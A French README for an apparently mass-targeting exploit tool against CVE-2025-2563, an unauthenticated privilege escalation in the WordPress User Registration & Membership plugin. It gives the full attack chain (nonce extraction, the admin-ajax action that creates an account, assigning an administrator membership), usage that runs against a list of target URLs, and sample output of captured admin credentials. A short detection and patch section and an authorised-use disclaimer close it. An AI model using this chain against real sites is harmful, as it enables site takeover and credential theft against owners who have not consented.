
Exploit multi-threadé pour CVE-2025-2563 ciblant l'élévation de privilèges non authentifiée dans le plugin WordPress User Registration & Membership. Automatise l'enregistrement anonyme, l'abus de nonce et la prise de contrôle du rôle administrateur.
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — Élévation de privilèges non authentifiée via le plugin User Registration & Membership pour WordPress. Exploit en chaîne complète : inscription anonyme → abus du nonce d'adhésion → prise de contrôle du rôle administrateur.
| Champ | Détail |
|---|---|
| CVE | CVE-2025-2563 |
| Plugin | User Registration & Membership |
| Version affectée | ≤ 4.1.1 |
| Type | Élévation de privilèges non authentifiée |
| CVSS | Critique |
| Vecteur | Réseau / Aucune authentification requise |
| WordPress | Toute version exécutant le plugin |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
form_id × membership_id × nonce découverteswp-admin avant de marquer comme succèsNATA_admin.txt, inscriptions dans reg.txtpip install requests rich
# 1. Add targets to list.txt (one URL per line)
# 2. Run
python CVE-2025-2563.py
Entrée : list.txt
https://target1.com
https://target2.com
https://target3.com
Sortie : NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| Fichier | Contenu |
|---|---|
NATA_admin.txt | Identifiants admin confirmés |
reg.txt | Toutes les inscriptions réussies |
Surveillez :
/wp-admin/admin-ajax.php avec action=user_registration_user_form_submit/membership-registration/ suivies immédiatement d'une affectation d'adhésion AJAXCorrectif : mettez à jour le plugin User Registration & Membership vers la version >= 4.1.2
Cet outil est publié uniquement pour les tests d'intrusion autorisés et la recherche en sécurité. L'auteur décline toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation écrite explicite avant de tester.
Natan Utama — github.com/dokter69 | Telegram : @ayasyanaro